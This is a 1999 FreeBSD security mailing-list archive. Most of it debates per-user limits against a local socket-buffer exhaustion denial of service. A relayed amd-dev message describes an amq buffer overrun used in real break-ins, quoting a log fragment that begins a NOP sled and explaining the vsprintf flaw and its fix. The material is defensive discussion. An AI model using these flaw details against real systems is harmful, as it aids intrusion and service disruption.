, Nick Hibma Subject: Re: FW: Local DoS in FreeBSD Cc: FreeBSD -- The Power to Serve , Mike Tancsa , freebsd-security@FreeBSD.ORG Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sep 1, 4:46pm, Garrett Wollman wrote: } Subject: Re: FW: Local DoS in FreeBSD } < said: } } > One of the features I like about Unix is for example free space } > available solely to the root user. It could be imagined that these } > things also apply to file handles, memory/swap space and other scarce } > resources. } } We have known for some time that the problem originally described } exists, but developing an acceptable solution has been a challenge. } Now that sockets carry around user credentials, it may perhaps not be } as difficult as it used to be. } } What needs to be done is to impose a per-UID resource limit on the } amount of socket buffer space available. } } What's not clear is: } } 1) At what level do you impose this limit? } } 2) Should the limit be statistical or exact? } } 3) What is a sensible default value? A fairly simple, short term measure would be to have a per-UID limit on the size of socket buffers. Most processes don't need huge buffers, and this would allow you relax the per-UID limits on descriptors and processes for an equivalent level of resource consumption. Maybe there should be a potentially tighter per-UID limit on sockets than the overall descriptor limit, since sockets consume quite a bit more kernel resources than descriptors. It should be possible to track the overall socket buffer space for each UID, but how do you enforce the limit? Do you cause the socket(), socketpair(), accept(), and setsockopt() calls to fail? Will userland code react well to this? Do you enforce an mbuf limit block write()/send*() when the limit is reached? What about packets received over the network, do they get tossed? Do you kill the process with the most mbufs when a shortage occurs ;-) Any resemblence to the swap overcommit debate is intended. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 1 19:12: 3 1999 Delivered-To: freebsd-security@freebsd.org Received: from granite.sentex.net (granite.sentex.ca [199.212.134.1]) by hub.freebsd.org (Postfix) with ESMTP id 770B514EC0 for ; Wed, 1 Sep 1999 19:11:59 -0700 (PDT) (envelope-from mike@sentex.net) Received: from gravel (ospf-mdt.sentex.net [205.211.164.81]) by granite.sentex.net (8.8.8/8.6.9) with SMTP id WAA01039; Wed, 1 Sep 1999 22:10:38 -0400 (EDT) Message-Id: <4.1.19990901222200.04560100@granite.sentex.ca> X-Sender: mdtancsa@granite.sentex.ca X-Mailer: QUALCOMM Windows Eudora Pro Version 4.1 Date: Wed, 01 Sep 1999 22:23:10 -0400 To: Don Lewis From: Mike Tancsa Subject: Re: FW: Local DoS in FreeBSD Cc: freebsd-security@FreeBSD.ORG In-Reply-To: <199909020205.TAA08666@salsa.gv.tsc.tdk.com> References: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Do you enforce an mbuf limit block write()/send*() when the limit is >reached? What about packets received over the network, do they get >tossed? Do you kill the process with the most mbufs when a shortage >occurs ;-) How do other OSes handle it ? I recall in the original thread, that the user tried it out on LINUX, and it handled the code without incident. ---Mike ********************************************************************** Mike Tancsa, Network Admin * mike@sentex.net Sentex Communications Corp, * http://www.sentex.net/mike Cambridge, Ontario * 01.519.651.3400 Canada * To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 1 19:12:35 1999 Delivered-To: freebsd-security@freebsd.org Received: from jade.chc-chimes.com (jade.chc-chimes.com [216.28.46.6]) by hub.freebsd.org (Postfix) with ESMTP id 4CE1714E9F for ; Wed, 1 Sep 1999 19:12:33 -0700 (PDT) (envelope-from billf@jade.chc-chimes.com) Received: by jade.chc-chimes.com (Postfix, from userid 1001) id 9E9A61C0E; Wed, 1 Sep 1999 21:14:53 -0400 (EDT) Received: from localhost (localhost [127.0.0.1]) by jade.chc-chimes.com (Postfix) with ESMTP id 8EFBA3817; Wed, 1 Sep 1999 21:14:53 -0400 (EDT) Date: Wed, 1 Sep 1999 21:14:53 -0400 (EDT) From: Bill Fumerola To: Don Lewis Cc: Garrett Wollman , Nick Hibma , FreeBSD -- The Power to Serve , Mike Tancsa , freebsd-security@FreeBSD.ORG Subject: Re: FW: Local DoS in FreeBSD In-Reply-To: <199909020205.TAA08666@salsa.gv.tsc.tdk.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 1 Sep 1999, Don Lewis wrote: > It should be possible to track the overall socket buffer space for each > UID, but how do you enforce the limit? Do you cause the socket(), > socketpair(), accept(), and setsockopt() calls to fail? Will userland > code react well to this? Any good code uses errx() or one of it's cousins. 53 ECONNABORTED Software caused connection abort. A connection abort was caused internal to your host machine. looks like a good thing to return when that is the case. -- - bill fumerola - billf@chc-chimes.com - BF1560 - computer horizons corp - - ph:(800) 252-2421 - bfumerol@computerhorizons.com - billf@FreeBSD.org - To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 1 20:33:10 1999 Delivered-To: freebsd-security@freebsd.org Received: from mail.ods.org (fbsd2.ods.org [205.252.42.124]) by hub.freebsd.org (Postfix) with SMTP id 1DAC614EC6 for ; Wed, 1 Sep 1999 20:33:03 -0700 (PDT) (envelope-from geniusj@ods.org) Received: (qmail 50430 invoked by uid 1000); 1 Sep 1999 23:35:14 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 1 Sep 1999 23:35:14 -0000 Date: Wed, 1 Sep 1999 19:35:14 -0400 (EDT) From: Systems Administrator To: Mike Tancsa Cc: FreeBSD -- The Power to Serve , freebsd-security@FreeBSD.ORG Subject: Re: FW: Local DoS in FreeBSD In-Reply-To: <4.1.19990901212536.04e852f0@granite.sentex.ca> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org You should raise nmbclusters as well as do the accounting ------------------------------------------------------------------------------ Jason DiCioccio | geniusj@free-bsd.org FreeBSD - The Power to Serve | http://www.freebsd.org | http://www.ods.org ------------------------------------------------------------------------------ On Wed, 1 Sep 1999, Mike Tancsa wrote: > At 06:04 PM 9/1/99 , FreeBSD -- The Power to Serve wrote: > >Explain what you mean? That is what login classes are for, you dont have > >to put "nobody" in a limited class if this is what you mean.. And you can > >set internal limits in apache if that's what you mean.. I feel you mean > >either one but I don't know :) > > I mean that putting the web user (in my case user webuser-- a UID <> > nobody) in a login.conf set class would seemingly be very restrictive. In > my tests, I had to set a user to have less than 16 open files and ~ 5 > processes max to prevent them from crashing a 3.x stable box. These sorts > of limits to me at first glance would be unworkable in apache. > > ---Mike > > > > >On Wed, 1 Sep 1999, Mike Tancsa wrote: > > > >> At 02:10 PM 9/1/99 -0600, FreeBSD -- The Power to Serve wrote: > >> >Exactly what I mean! Limit file descriptors, and it also uses a lot of CPU > >> >time so you can limit that too.. It will never crash the system with the > >> >proper limits set :). They can run it all they want. > >> > >> Well, that sort of helps for kids just doing ./a.out, but would you put > >> accounting limits on your web server ? That seems like a nasty can of > >> configuration worms one would be opening no ? > >> > >> ---Mike > >> > >> > >> > > >> >On Wed, 1 Sep 1999, Mike Tancsa wrote: > >> > > >> >> At 11:49 AM 9/1/99 -0600, FreeBSD -- The Power to Serve wrote: > >> >> >If you have public access users, you should have login accounting in the > >> >> >first place.. and yes, it does stop it :).. I verified this on a 3.2 box > >> >> >with my login accounting setup.. > >> >> > >> >> How does accounting stop it ? Or do you mean it just discourages users > >> >> from doing it ? How much overhead does accounting add to the system ? > >> >> Also, limiting the amount of file descriptors can prevent it, as the > 'bug' > >> >> is essentially a resource starving issue (e.g. fork bomb) > >> >> > >> >> ---Mike > >> >> ------------------------------------------------------------------------ > >> >> Mike Tancsa, tel 01.519.651.3400 > >> >> Network Administrator, mike@sentex.net > >> >> Sentex Communications www.sentex.net > >> >> Cambridge, Ontario Canada > >> >> > >> >> > >> >> To Unsubscribe: send mail to majordomo@FreeBSD.org > >> >> with "unsubscribe freebsd-security" in the body of the message > >> >> > >> > > >> > > >> > > >> ------------------------------------------------------------------------ > >> Mike Tancsa, tel 01.519.651.3400 > >> Network Administrator, mike@sentex.net > >> Sentex Communications www.sentex.net > >> Cambridge, Ontario Canada > >> > >> > >> To Unsubscribe: send mail to majordomo@FreeBSD.org > >> with "unsubscribe freebsd-security" in the body of the message > >> > > > > > > > >To Unsubscribe: send mail to majordomo@FreeBSD.org > >with "unsubscribe freebsd-security" in the body of the message > > > > ********************************************************************** > Mike Tancsa, Network Admin * mike@sentex.net > Sentex Communications Corp, * http://www.sentex.net/mike > Cambridge, Ontario * 01.519.651.3400 > Canada * > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 1 20:33:34 1999 Delivered-To: freebsd-security@freebsd.org Received: from mail.ods.org (fbsd2.ods.org [205.252.42.124]) by hub.freebsd.org (Postfix) with SMTP id 1CA7B152C6 for ; Wed, 1 Sep 1999 20:33:27 -0700 (PDT) (envelope-from geniusj@ods.org) Received: (qmail 50442 invoked by uid 1000); 1 Sep 1999 23:36:00 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 1 Sep 1999 23:36:00 -0000 Date: Wed, 1 Sep 1999 19:36:00 -0400 (EDT) From: Systems Administrator To: Joe Gleason Cc: Nick Hibma , FreeBSD -- The Power to Serve , Mike Tancsa , freebsd-security@FreeBSD.ORG Subject: Re: FW: Local DoS in FreeBSD In-Reply-To: <019d01bef4e1$46125ca0$256b52c6@tasam.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org They dont ship with a lot of mbufs to keep it running on slower and less-capable machines. ------------------------------------------------------------------------------ Jason DiCioccio | geniusj@free-bsd.org FreeBSD - The Power to Serve | http://www.freebsd.org | http://www.ods.org ------------------------------------------------------------------------------ On Wed, 1 Sep 1999, Joe Gleason wrote: > True, I consider myself an a-typical Joe, but still the point is valid that > a FreeBSD should be fairly resiliant and stable without needing to do alot > of tweaking. There is also the argument that setting resictions by default > could mess up people who don't know to look at the resrictions when > something doesn't work. Probably some happy medium could probably be > achived. > > I think I would be happy with a default config in which: > The average unprived user could not crash the system, but they could use > alot of resources and slow the system down drasticly. > > Joe Gleason > Tasam > > > The average Joe doesn't run FreeBSD > > > > > > -------------------------------------------------------------------------- > ---- > > Jason DiCioccio | geniusj@free-bsd.org > > FreeBSD - The Power to Serve | http://www.freebsd.org > > | http://www.ods.org > > -------------------------------------------------------------------------- > ---- > > > > On Wed, 1 Sep 1999, Nick Hibma wrote: > > > > > > > > That's one of the comments Microsoft makes when a security hole is > > > discovered, switch off that, increase the security level here. It always > > > makes me kind of mad, because that's not what the Joe Average does or > > > is considers something he should do until it's too late. > > > > > > One of the features I like about Unix is for example free space > > > available solely to the root user. It could be imagined that these > > > things also apply to file handles, memory/swap space and other scarce > > > resources. > > > > > > Nick > > > > > > > > > > Exactly what I mean! Limit file descriptors, and it also uses a lot of > CPU > > > > time so you can limit that too.. It will never crash the system with > the > > > > proper limits set :). They can run it all they want. > > > > > > > > > > > > On Wed, 1 Sep 1999, Mike Tancsa wrote: > > > > > > > > > At 11:49 AM 9/1/99 -0600, FreeBSD -- The Power to Serve wrote: > > > > > >If you have public access users, you should have login accounting > in the > > > > > >first place.. and yes, it does stop it :).. I verified this on a > 3.2 box > > > > > >with my login accounting setup.. > > > > > > > > > > How does accounting stop it ? Or do you mean it just discourages > users > > > > > from doing it ? How much overhead does accounting add to the system > ? > > > > > Also, limiting the amount of file descriptors can prevent it, as the > 'bug' > > > > > is essentially a resource starving issue (e.g. fork bomb) > > > > > > > > > > ---Mike > > > > > > ------------------------------------------------------------------------ > > > > > Mike Tancsa, tel 01.519.651.3400 > > > > > Network Administrator, mike@sentex.net > > > > > Sentex Communications www.sentex.net > > > > > Cambridge, Ontario Canada > > > > > > > > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > > > > with "unsubscribe freebsd-security" in the body of the message > > > > > > > > > > > > > > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > > > with "unsubscribe freebsd-security" in the body of the message > > > > > > > > > > -- > > > e-Mail: hibma@skylink.it > > > > > > > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 1 20:36:27 1999 Delivered-To: freebsd-security@freebsd.org Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (Postfix) with ESMTP id B881514EC6 for ; Wed, 1 Sep 1999 20:36:23 -0700 (PDT) (envelope-from wollman@khavrinen.lcs.mit.edu) Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.9.1/8.9.1) id XAA08433; Wed, 1 Sep 1999 23:35:05 -0400 (EDT) (envelope-from wollman) Date: Wed, 1 Sep 1999 23:35:05 -0400 (EDT) From: Garrett Wollman Message-Id: <199909020335.XAA08433@khavrinen.lcs.mit.edu> To: Don Lewis Cc: freebsd-security@FreeBSD.ORG Subject: socket buffer limits (was: Re: FW: Local DoS in FreeBSD) In-Reply-To: <199909020205.TAA08666@salsa.gv.tsc.tdk.com> References: <199909020205.TAA08666@salsa.gv.tsc.tdk.com> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org < said: [Just to recap, I wrote:] 1) At what level do you impose this limit? 2) Should the limit be statistical or exact? 3) What is a sensible default value? [Don replied:] > A fairly simple, short term measure would be to have a per-UID limit on the > size of socket buffers. [...] Right -- this is a cheap thing to do, which happens to be rather bad for performance in the long term. (RTT on my network between two gigabit-attached servers is ~1 ms, thus the pipe size is already 60 kb. For a 100-Mbit/s path to California, the pipe is about 420 kb.) > Maybe there should be a potentially tighter per-UID limit on sockets than > the overall descriptor limit, since sockets consume quite a bit more > kernel resources than descriptors. I don't think this is a significantly useful limit to impose -- at present, the expensive resource is mbuf clusters, and I don't see that changing in principle any time soon. > It should be possible to track the overall socket buffer space for each > UID, but how do you enforce the limit? The problem with this approach is that socket buffer allotments are effectively free. Thus, you are limiting a resource which doesn't have a natural limit. I'd put it in the same category of short-term kluge as limiting individual socket buffers. Ideally, you'd like users to be able to request huge socket buffers to take advantage of fat pipes, while still limiting their overall usage. One way would be to pre-allocate a buffer pool which is shared by all the user's sockets; however, this is a very bad thing to do from a protocol design perspective, since it may be preferable to use interface memory and that may in turn be in short supply. > Do you cause the socket(), socketpair(), accept(), and setsockopt() > calls to fail? Clearly accept() cannot fail, since a new connection over-quota would have to be rejected in sonewconn() in order to have any useful effect. There is an argument to be made for the others to simply shrink the buffers to a workable-but-tiny value (say, one or two mbuf clusters' worth), which will allow users to communicate very slowly but won't fail. (This is preferable from a fail-safe standpoint as well. If a cracker uses up all of `daemon's mbuf quota, you still want daemons to be able to do their thing, which might have something to do with telling you about the attack.) > Do you enforce an mbuf limit block write()/send*() when the limit is > reached? What about packets received over the network, do they get > tossed? I believe the correct long-term model is actually to use a random early detection mechanism on incoming packets. Users would then have a two-level buffer size limit: at level l1, writes block (or return an error if the socket is in non-blocking mode) and incoming data is dropped according to the RED algorithm; at level l2, writes block and incoming data is dropped. (In protocols like TCP you obviously have to do this in a protocol-aware fashion to avoid deadlock.) The difficulty with this approach is: 1) finding all the places where socket buffers are touched to make sure the right thing happens, and 2) doing it in such a way which is not intimately tied to the existing (losing) socket buffer model. -GAWollman -- Garrett A. Wollman | O Siem / We are all family / O Siem / We're all the same wollman@lcs.mit.edu | O Siem / The fires of freedom Opinions not those of| Dance in the burning flame MIT, LCS, CRS, or NSA| - Susan Aglukark and Chad Irschick To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 1 20:39:32 1999 Delivered-To: freebsd-security@freebsd.org Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (Postfix) with ESMTP id EC41914FDA for ; Wed, 1 Sep 1999 20:39:29 -0700 (PDT) (envelope-from wollman@khavrinen.lcs.mit.edu) Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.9.1/8.9.1) id XAA08451; Wed, 1 Sep 1999 23:39:28 -0400 (EDT) (envelope-from wollman) Date: Wed, 1 Sep 1999 23:39:28 -0400 (EDT) From: Garrett Wollman Message-Id: <199909020339.XAA08451@khavrinen.lcs.mit.edu> To: Mike Tancsa Cc: freebsd-security@FreeBSD.ORG Subject: Re: FW: Local DoS in FreeBSD In-Reply-To: <4.1.19990901191051.04e80570@granite.sentex.ca> References: <199909012046.QAA07324@khavrinen.lcs.mit.edu> <4.1.19990901191051.04e80570@granite.sentex.ca> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org < said: > Do you think these changes would be incorporated into the 3.x branch, or > strictly 4.x ? By the time the work actually gets done, 3.x will be history. Like I said, it's hard. -GAWollman -- Garrett A. Wollman | O Siem / We are all family / O Siem / We're all the same wollman@lcs.mit.edu | O Siem / The fires of freedom Opinions not those of| Dance in the burning flame MIT, LCS, CRS, or NSA| - Susan Aglukark and Chad Irschick To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 1 20:49:31 1999 Delivered-To: freebsd-security@freebsd.org Received: from cheops.anu.edu.au (cheops.anu.edu.au [150.203.76.24]) by hub.freebsd.org (Postfix) with ESMTP id E5F6814FDA for ; Wed, 1 Sep 1999 20:49:22 -0700 (PDT) (envelope-from avalon@cheops.anu.edu.au) Received: (from avalon@localhost) by cheops.anu.edu.au (8.9.1/8.9.1) id NAA23859; Thu, 2 Sep 1999 13:47:10 +1000 (EST) From: Darren Reed Message-Id: <199909020347.NAA23859@cheops.anu.edu.au> Subject: Re: socket buffer limits (was: Re: FW: Local DoS in FreeBSD) To: wollman@khavrinen.lcs.mit.edu (Garrett Wollman) Date: Thu, 2 Sep 1999 13:47:10 +1000 (EST) Cc: Don.Lewis@tsc.tdk.com, freebsd-security@FreeBSD.ORG In-Reply-To: <199909020335.XAA08433@khavrinen.lcs.mit.edu> from "Garrett Wollman" at Sep 1, 99 11:35:05 pm X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org How about failing setsockopt's when they try to increase buffer space if it would mean buffer space commitments would exceed a high water mark ? Also, what if mbufs are dropped and/or send/write fails (ENOBUFS) if there is nobody waiting to receive data and a high water mark has been reached ? Darren To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 1 21:32:14 1999 Delivered-To: freebsd-security@freebsd.org Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (Postfix) with ESMTP id 9B42214CB0 for ; Wed, 1 Sep 1999 21:32:12 -0700 (PDT) (envelope-from wollman@khavrinen.lcs.mit.edu) Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.9.1/8.9.1) id AAA08736; Thu, 2 Sep 1999 00:31:35 -0400 (EDT) (envelope-from wollman) Date: Thu, 2 Sep 1999 00:31:35 -0400 (EDT) From: Garrett Wollman Message-Id: <199909020431.AAA08736@khavrinen.lcs.mit.edu> To: Darren Reed Cc: freebsd-security@FreeBSD.ORG Subject: Re: socket buffer limits (was: Re: FW: Local DoS in FreeBSD) In-Reply-To: <199909020347.NAA23859@cheops.anu.edu.au> References: <199909020335.XAA08433@khavrinen.lcs.mit.edu> <199909020347.NAA23859@cheops.anu.edu.au> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org < said: > How about failing setsockopt's when they try to increase buffer space > if it would mean buffer space commitments would exceed a high water mark ? That's no different from what I dismissed in my reply to Don. We don't want to restrict the potential TCP window a user may offer, just how much actual kernel memory he may tie up at once. > Also, what if mbufs are dropped and/or send/write fails (ENOBUFS) if there > is nobody waiting to receive data and a high water mark has been reached ? POLA violation for sure. (TCP should be rewritten, however, to use the receiver's advertised window for user push-back, but that's at least a full-time person-year's worth of work to write, test, and tune. That would mean that loopback connections could only use one window's-worth of kernel memory for buffering.) -GAWollman -- Garrett A. Wollman | O Siem / We are all family / O Siem / We're all the same wollman@lcs.mit.edu | O Siem / The fires of freedom Opinions not those of| Dance in the burning flame MIT, LCS, CRS, or NSA| - Susan Aglukark and Chad Irschick To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 2 0:35:51 1999 Delivered-To: freebsd-security@freebsd.org Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id 3E55114D41 for ; Thu, 2 Sep 1999 00:35:48 -0700 (PDT) (envelope-from des@flood.ping.uio.no) Received: (from des@localhost) by flood.ping.uio.no (8.9.3/8.9.3) id JAA94099; Thu, 2 Sep 1999 09:32:37 +0200 (CEST) (envelope-from des) To: Systems Administrator Cc: "L. Sassaman" , FreeBSD -- The Power to Serve , Jeff Wheat , freebsd-security@FreeBSD.ORG Subject: Re: FW: Local DoS in FreeBSD References: From: Dag-Erling Smorgrav Date: 02 Sep 1999 09:32:37 +0200 In-Reply-To: Systems Administrator's message of "Wed, 1 Sep 1999 15:12:03 -0400 (EDT)" Message-ID: Lines: 10 X-Mailer: Gnus v5.5/Emacs 19.34 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Systems Administrator writes: > If you have it set so that it does SUID for cgi and runs it as the user or > uses the users accounting limits, it won't work.. and yes, you should set > some sensible apache limits per user on that stuff, I know its possible. Apache's suEXEC wrapper doesn't enforce user limits. DES -- Dag-Erling Smorgrav - des@flood.ping.uio.no To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 2 1:37: 6 1999 Delivered-To: freebsd-security@freebsd.org Received: from hera.ik.bme.hu (hera.ik.bme.hu [152.66.243.132]) by hub.freebsd.org (Postfix) with ESMTP id 8D00814C0C for ; Thu, 2 Sep 1999 01:36:57 -0700 (PDT) (envelope-from mohacsi@hera.ik.bme.hu) Received: from localhost (mohacsi@localhost) by hera.ik.bme.hu (8.9.3/8.9.3) with ESMTP id KAA12922 for ; Thu, 2 Sep 1999 10:36:51 +0200 (MET DST) Date: Thu, 2 Sep 1999 10:36:49 +0200 (MET DST) From: Mohacsi Janos To: freebsd-security@freebsd.org Subject: amd buffer overflow some Linuxes, in FreeBSD too? Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi, There are some reports that amd is vulnerable to stack overflow remote root exploit attack in some Linux distribution. http://linuxtoday.com/stories/9440.html Can somebody check whether the FreeBSD version also vulnerable? As I see on the amd-dev list the amq -M code is the origin of the remote root exploit. snip from amd-dev list archive: --------------------------------------------------------------------------- From: Erez Zadok To: Douglas Alan Cc: ezk@shekel.mcl.cs.columbia.edu, amd-dev@cs.columbia.edu Subject: Re: am-utils security hole? Sender: amd-dev-owner@cs.columbia.edu Precedence: bulk X-majordomo-list: amd-dev from majordomo.cs.columbia.edu In message <199908241739.NAA21639@space.mit.edu>, Douglas Alan writes: > Hi. Have you heard anything about an am-utils buffer overrun security > hole? Our RedHat 6.0 computers have all been broken into, apparently > using a bug in amq. Here is the suspicious log entry from > /var/log/messages: > > Aug 21 20:49:51 lagavulin 27>Aug 21 20:49:51 amd[3531]: amq requested > mount of > <90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90> [...] > ^C > > |>oug I verified that the amd distributed with redhat 6.0 is indeed compiled without ENABLE_AMQ_MOUNT. This is the routine that logged the message you reported: #ifdef ENABLE_AMQ_MOUNT #else /* not ENABLE_AMQ_MOUNT */ int * amqproc_mount_1_svc(voidp argp, struct svc_req *rqstp) { static int rc; char *s = *(amq_string *) argp; plog(XLOG_ERROR, "amq requested mount of %s, but code is disabled", s); rc = EINVAL; return &rc; } #endif /* not ENABLE_AMQ_MOUNT */ What I find strange is that your logs don't show the "but code is disabled" part. This is probably b/c the string 's' overran the plog (vsprintf) buffer. Another strange thing I found was that as far as I can tell, the amq -M rpc message uses xdr_amq_string exclusively. This xdr routine uses xdr_string(..., AMQ_STRLEN), and AMQ_STRLEN is 1024. That is, I limit the maximum size of an amq rpc message that can be passed to amd. What I'm not sure, however, is if xdr_string will handle a string passed to it that is _exactly_ 1024 bytes long, leaving no space for a terminating null. Anyway, I believe that this buffer overrun was triggered in real_plog(), while logging the message, not in the xdr/rpc code. real_plog() uses temp buffers of a fixed maximum size (1024 bytes), and calls vsprintf(ptr, efmt, vargs); it is this 'ptr' that has a maximum length. But efmt+vargs can be exploited to expand into a string that's longer than 1024 bytes, thus overrunning 'ptr'. I cannot think of a clean way to make sure vsprintf expands a string up to a given length. Anyone? Nevertheless, the safest thing IMHO is to simply avoid including any amq -M code unless the ENABLE_AMQ_MOUNT option is turned on (via configure --enable-amq-mount). So this is what I did: (1) amq/amq.c: while the usage() string hides the -M option if ENABLE_AMQ_MOUNT is off, getopt() was still processing -M. Duh. (2) amd/amq_svc.c (amq_program_1): the RPC dispatch routine still processed amq -M requests, but then called a version of amqproc_mount_1_svc that simply printed "... but code is disabled." I conditionalized the dispatching into amqproc_mount_1_svc on #ifdef ENABLE_AMQ_MOUNT. (3) amd/amq_subr.c: completely removed the amqproc_mount_1_svc() routine that's called when ENABLE_AMQ_MOUNT is not on. The above fixes are now in 6.0.1s11. While they were not throughly tested, I think they are much safer than anything prior to s11, and certainly prior to s10. There may be other possible exploits in the amq/amd RPC interface. I don't have the time now to inspect and analyze them all, but if anyone finds something bad, please send patches. Also, if more security fixes will come up in the next few days, I'll probably have to cut more 6.0.1 snapshots. ------------------------------------------------------------------------ Thanks, Janos Mohacsi To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 2 4:45:18 1999 Delivered-To: freebsd-security@freebsd.org Received: from netserv1.chg.ru (netserv1.chg.ru [193.233.46.3]) by hub.freebsd.org (Postfix) with ESMTP id 4D86514F02; Thu, 2 Sep 1999 04:45:02 -0700 (PDT) (envelope-from ks@chg.ru) Received: from speecart.chg.ru (speecart.chg.ru [193.233.46.2]) by netserv1.chg.ru (8.9.3/8.9.1) with ESMTP id PAA20293; Thu, 2 Sep 1999 15:44:51 +0400 (MSD) Message-ID: X-Mailer: XFMail 1.3 [p0] on FreeBSD X-Priority: 3 (Normal) Content-Type: text/plain; charset=KOI8-R Content-Transfer-Encoding: 8bit MIME-Version: 1.0 Date: Thu, 02 Sep 1999 15:42:44 +0400 (MSD) Organization: Landau Institute for Theoretical Physics From: "Sergey S. Kosyakov" To: freebsd-net@freebsd.org, freebsd-security@freebsd.org, freebsd-users@freebsd.org Subject: New tool for IP secure tunnels Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org 1.0 version of TUND was released. ftp://ftp.chg.ru/pub/networking/freebsd/README. TUND allows for creation IP over IP (current version) tunnels, which can help to organize private networks, secure channels, non-tivial network topologies, etc. TUND can work upon tun(4) interface or divert(4) sockets. With single running process of TUND up to 65534 tunnels can be created. If tunnel is configured to work with tun(4) pseudo-device, it can be feeded with standard IP routing (route add ...) I the case of ipfw(8), when tunnel is configured to work with divert(4) socket, it can be feeded in many ways - by source or destination, by protocol, by ports, etc. TUND supports compression with ZLIB. Compression level can be configured in tund.conf. Data in tunnels can be encrypted with BlowFish, IDEA or RC5 ciphers from OPenSSL. Symmetric keys for ciphers are passed with RSA identification and encryption. Each host running TUND has own RSA private key. Public version of this key should be transferred to other end of tunnel. Random number is mixed with data before encryption for preventing "dictionary" attack. --- ---------------------------------- Sergey Kosyakov Laboratory of Distributed Computing Department of High-Performance Computing and Applied Network Research Landau Institute for Theoretical Physics E-Mail: ks@chg.ru Date: 02-Sep-99 Time: 15:38:56 ---------------------------------- --- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 2 7:17:57 1999 Delivered-To: freebsd-security@freebsd.org Received: from pop111.ocn.ne.jp (pop111.ocn.ne.jp [202.234.233.71]) by hub.freebsd.org (Postfix) with ESMTP id 6C3E515BAB for ; Thu, 2 Sep 1999 07:17:44 -0700 (PDT) (envelope-from academy@academyjapan.co.jp) Received: from pop111.ocn.ne.jp by pop111.ocn.ne.jp (8.9.1a/OCN) id XAA11532; Thu, 2 Sep 1999 23:16:04 +0900 (JST) Date: Thu, 2 Sep 1999 23:16:04 +0900 (JST) Message-Id: <199909021416.XAA11532@pop111.ocn.ne.jp> From: =?ISO-2022-JP?B?QWNhZGVteSBKYXBhbn==?= To: =?ISO-2022-JP?B?ZnJlZWJzZC1zZWN1cml0eUBGcmVlQlNELm9yZ2==?= X-Mailer: Direct Email v0.22 Subject: =?ISO-2022-JP?B?GyRCJUYlbCVTRUVPQyROJCpDTiRpJDshIRsoQkluZm8gb24gVmlkZW9waG9uZW==?= Mime-Version: 1.0 Content-Type: text/plain; charset=ISO-2022-JP Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org $B$3$s$K$A$o!"(B $B$3$l$OJXMx!*(B Here's a good news for you, $B%[%F%k!"N94[!"C1?HIkG$!"N13X$K$b(B a news of the Videophone 